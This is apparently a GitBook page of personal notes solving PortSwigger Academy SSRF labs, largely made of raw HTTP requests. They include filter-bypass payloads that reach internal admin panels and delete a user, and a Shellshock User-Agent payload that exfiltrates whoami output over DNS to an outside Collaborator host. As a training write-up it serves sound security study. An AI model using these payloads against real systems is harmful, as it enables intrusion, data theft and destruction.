OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • Lab: Basic SSRF against the local server
  • Lab: Basic SSRF against another back-end system
  • Lab: SSRF with blacklist-based input filter
  • Lab: SSRF with whitelist-based input filter
  • Lab: SSRF with filter bypass via open redirection vulnerability
  • Lab: Blind SSRF with out-of-band detection
  • Lab: Blind SSRF with Shellshock exploitation
  1. PortSwigger Academy
  2. Server-side topics

Server-side request forgery (SSRF)

https://portswigger.net/web-security/ssrf

Lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system.

POST /product/stock
...
stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
POST /product/stock
...
stockApi=http%3a//localhost/admin
-------------------
POST /product/stock
...
stockApi=http%3a//localhost/admin/delete?username=carlos

Lab: Basic SSRF against another back-end system

This lab has a stock check feature which fetches data from an internal system.

POST /product/stock HTTP/1.1
...
stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

→ Sniper Attack with numbers

POST /product/stock HTTP/1.1
...
stockApi=http%3A%2F%2F192.168.0.§1§%3A8080%2Fadmin
----------------------------
POST /product/stock HTTP/1.1
...
stockApi=http%3A%2F%2F192.168.0.182%3A8080%2Fadmin
Response:
<a href="/http://192.168.0.182:8080/admin/delete?username=carlos">Delete</a>
----------------------------
POST /product/stock HTTP/1.1
...
stockApi=http%3A%2F%2F192.168.0.182%3A8080%2Fadmin/delete?username=carlos

Lab: SSRF with blacklist-based input filter

This lab has a stock check feature which fetches data from an internal system. The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

POST /product/stock
...
stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

  • localhost - blocked

  • 127.0.0.1 - blocked

  • 2130706433 - bypassed

  • 017700000001 - bypassed

  • 127.1 - bypassed

  • admin - blocked

  • %61%64%6d%69%6e - admin url all chars encoded - blocked

  • %25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 - admin url double all chars encoded - bypassed

POST /product/stock
...
stockApi=http%3A%2F%2F127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

Lab: SSRF with whitelist-based input filter

This lab has a stock check feature which fetches data from an internal system. The developer has deployed an anti-SSRF defense you will need to bypass.

POST /product/stock
...
stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

Error → "External stock check host must be stock.weliketoshop.net"

POST /product/stock
...
stockApi=http%3A%2F%2Flocalhost:80%25%32%33@stock.weliketoshop.net
-------------------
POST /product/stock
...
stockApi=http%3A%2F%2Flocalhost:80%25%32%33@stock.weliketoshop.net/admin
-------------------
POST /product/stock
...
stockApi=http%3A%2F%2Flocalhost:80%25%32%33@stock.weliketoshop.net/admin/delete?username=carlos

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Lab: SSRF with filter bypass via open redirection vulnerability

This lab has a stock check feature which fetches data from an internal system. The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.

GET /product/nextProduct?currentProductId=3&path=/product?productId=4 HTTP/1.1
POST /product/stock
...
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
-------------------
POST /product/stock
...
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

Lab: Blind SSRF with out-of-band detection

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.

Collaborator address: pxq0vdgf9ukiw23j0koup8bsbjh95y.burpcollaborator.net

GET /product?productId=3 HTTP/1.1
...
Referer: http://pxq0vdgf9ukiw23j0koup8bsbjh95y.burpcollaborator.net
...

Lab: Blind SSRF with Shellshock exploitation

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.

To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user.

Collaborator address: hdysb5w7pm0acujbgc4m50rkrbx2lr.burpcollaborator.net

→ Sniper Attack - Number 0-255

GET /product?productId=20 HTTP/1.1
...
User-Agent: () { :; }; /bin/bash -c "nslookup $(whoami).hdysb5w7pm0acujbgc4m50rkrbx2lr.burpcollaborator.net"
...
Referer: https://192.168.0.§1§:8080/
...

The Collaborator server received a DNS lookup of type AAAA for the domain name peter-rmQazs.hdysb5w7pm0acujbgc4m50rkrbx2lr.burpcollaborator.net.

PreviousFile upload vulnerabilitiesNextXML external entity (XXE) injection

Last updated 3 years ago

Shellshock:

https://www.exploit-db.com/exploits/34765